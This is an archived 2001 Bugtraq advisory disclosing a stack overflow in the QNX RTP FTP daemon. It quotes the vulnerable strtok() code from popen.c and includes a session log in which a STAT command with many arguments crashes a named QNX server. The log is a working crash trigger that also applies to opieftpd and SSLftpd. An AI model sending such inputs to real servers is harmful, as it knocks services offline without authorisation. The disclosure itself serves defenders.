[18967] in bugtraq

home help back first fref pref prev next nref lref last post

QNX RTP ftpd stack overflow

daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Fri Feb 2 17:36:27 2001

Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
                  bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID:  <20010202200309.X675@riget.scene.pl>
Date:         Fri, 2 Feb 2001 20:03:09 +0100
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok()
based stack overflow.

Offending code from ftpd/popen.c:


        char **pop, *argv[100], *gargv[1000], *vv[2];

        for (argc = 0, cp = program;; cp = NULL)
                if (!(argv[argc++] = strtok(cp, " \t\n")))
                        break;

        /* glob each piece */
        gargv[0] = argv[0];
        for (gargc = argc = 1; argv[argc]; argc++) {
            argv[argc] = strdup(argv[argc]);


Code is called, when STAT command is issued. Overflow occurs, when large
number of arguments is applied.

Identifing vulnerable system:

220 quics.qnx.com FTP server (Version 5.60) ready.
user ftp
331 Guest login ok, send ident as password.
pass dupa
230 Guest login ok, access restrictions apply.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.

BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
     vulnerable to this attack.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
home help back first fref pref prev next nref lref last post